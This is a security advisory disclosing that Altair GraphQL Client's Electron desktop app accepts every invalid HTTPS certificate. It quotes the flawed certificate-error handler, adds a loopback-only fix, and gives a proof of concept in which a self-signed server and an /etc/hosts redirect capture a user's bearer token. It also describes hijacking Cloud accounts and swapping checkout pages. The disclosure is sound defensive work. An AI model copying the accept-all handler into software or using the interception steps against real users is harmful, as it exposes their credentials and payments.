Summary
Altair GraphQL Client's desktop app does not validate HTTPS certificates, allowing a man-in-the-middle to intercept all requests.
Details
Certificate validation is disabled here (altair/packages/altair-electron/src/app/index.ts, lines 162 to 170 at commit 004f645):

```ts
app.on(
  'certificate-error',
  (event, webContents, url, error, certificate, callback) => {
    // Accepts the certificate for every host and every error, not just local servers
    event.preventDefault();
    callback(true);
    // Inform user of invalid certificate
    webContents.send('certificate-error', error);
  }
);
```
This is intended to allow making queries against local servers using self-signed certificates; however, it has unintended security implications. It affects all requests made in the renderer context, including GraphQL requests made by the user and internal requests made by Altair's GraphQL Cloud account system.
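The following is an added example, not Altair's code, showing how the same handler could keep the local-development use case without disabling validation globally: a plain decision function that tolerates a certificate error only for loopback hosts (or hosts on an explicit, user-maintained allowlist, which is an assumed setting), wired into an Electron `certificate-error` handler. The Electron `app` object is never required here; `simulateCertificateError` stands in for it so the wiring can be exercised offline, and the error string `net::ERR_CERT_AUTHORITY_INVALID` is a sample value.

```javascript
// Added example (not Altair's code): certificate-error policy that is per-host
// instead of global. Uses only Node's built-in global URL, no Electron import.

// Hosts for which a certificate error may be tolerated. Loopback only by default;
// the allowlist parameter models an assumed explicit per-host opt-in setting.
const LOOPBACK_HOSTS = new Set(['localhost', '127.0.0.1', '[::1]']);

// Returns true only if an invalid certificate should be accepted for this URL.
function shouldTrustInvalidCertificate(requestUrl, allowlist = new Set()) {
  let parsed;
  try {
    parsed = new URL(requestUrl);
  } catch {
    return false; // unparseable URL: never trust
  }
  if (parsed.protocol !== 'https:') return false;
  // URL.hostname keeps the brackets on IPv6 literals, e.g. "[::1]"
  const host = parsed.hostname.toLowerCase();
  return LOOPBACK_HOSTS.has(host) || allowlist.has(host);
}

// Electron main-process wiring. `app` is expected to be require('electron').app;
// here it is passed in so the function can be driven by a stub.
function registerCertificateErrorHandler(app, allowlist = new Set()) {
  app.on('certificate-error', (event, webContents, url, error, certificate, callback) => {
    if (shouldTrustInvalidCertificate(url, allowlist)) {
      event.preventDefault();                        // take over Chromium's decision
      callback(true);                                // accept only for loopback/allowlisted hosts
      webContents.send('certificate-error', error);  // still inform the user
    } else {
      callback(false);                               // every other host keeps normal validation
    }
  });
}

// Offline stand-in for Electron: registers the handler on a fake app, fires one
// certificate-error event for requestUrl and reports what the handler decided.
function simulateCertificateError(requestUrl, allowlist = new Set()) {
  const handlers = {};
  const fakeApp = { on: (name, fn) => { handlers[name] = fn; } };
  registerCertificateErrorHandler(fakeApp, allowlist);

  const result = { prevented: false, accepted: null, notified: null };
  const event = { preventDefault: () => { result.prevented = true; } };
  const webContents = { send: (channel, payload) => { result.notified = payload; } };
  const sampleError = 'net::ERR_CERT_AUTHORITY_INVALID'; // sample Chromium error string

  handlers['certificate-error'](event, webContents, requestUrl, sampleError, {}, (ok) => {
    result.accepted = ok;
  });
  return result;
}
```

With this policy the PoC host below is rejected (the request fails, as it would in a browser), while `https://localhost:4000/graphql` with a self-signed certificate still works and still triggers the in-app notice.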
PoC
1. Generate self-signed certificates with `openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 3650`. Use default values for all fields.
2. Save this as `server.js`:

   ```js
   const https = require('https');
   const fs = require('fs');

   // HTTPS server using the self-signed certificate from step 1
   const server = https.createServer({
     key: fs.readFileSync('key.pem'),
     cert: fs.readFileSync('cert.pem')
   }, (req, res) => {
     // Echo the Authorization header back to show the request was readable
     res.write('Hello victim. Your token is: ' + req.headers.authorization);
     res.end();
   });
   server.listen(443, () => console.log('Server started'));
   ```

3. Start the server with `sudo node server.js`. Root permissions are only used to listen on port 443.
4. To simulate a man-in-the-middle, append to `/etc/hosts` to make traffic to https-validation-bug-poc.altairgraphql.dev go to the server started in step 3:

   ```
   127.0.0.1 https-validation-bug-poc.altairgraphql.dev
   ```

   Validate that this was successful by visiting https://https-validation-bug-poc.altairgraphql.dev in a browser. An HTTPS certificate error should appear due to the self-signed certificate.
5. Open the Altair desktop app and make a GraphQL request to https://https-validation-bug-poc.altairgraphql.dev/ using any query and a random bearer token.
6. Despite using HTTPS, the certificate error caused by the attacker's server using a self-signed certificate is ignored. The attacker's server returns a response demonstrating full access to the request's headers and body, which is then displayed in the Altair interface. This attack would also work on a real GraphQL API like api.github.com.
In addition to compromising the confidentiality and integrity of the victim's GraphQL requests, the attacker can also:
- compromise the confidentiality and integrity of the victim's Altair GraphQL Cloud account as those requests are also sent from the renderer context and thus without certificate validation
- modify requests to billing APIs like https://api.altairgraphql.dev/user/upgrade-pro to return a checkout URL controlled by the attacker instead of a real Altair checkout page
In all of these attacks the warning "Your request has an invalid certificate. You should check that your request is coming from a trusted source" does appear. However:
- by the time the warning appears, the attack has already been completed
- the warning is easy to miss in the bottom-right corner and disappears quickly
- the warning does not provide sufficient context for a user to determine if the request came from a "trusted source"
- the same message is used for requests that were not initiated by the user such as Altair GraphQL Cloud synchronizing collections when the app is opened
Impact
Any Altair users on untrusted networks (e.g. public Wi-Fi, malicious DNS servers) may have all GraphQL request and response headers and bodies fully compromised, including authorization tokens. The attack also allows obtaining full access to any signed-in Altair GraphQL Cloud account and replacing payment checkout pages with a malicious website.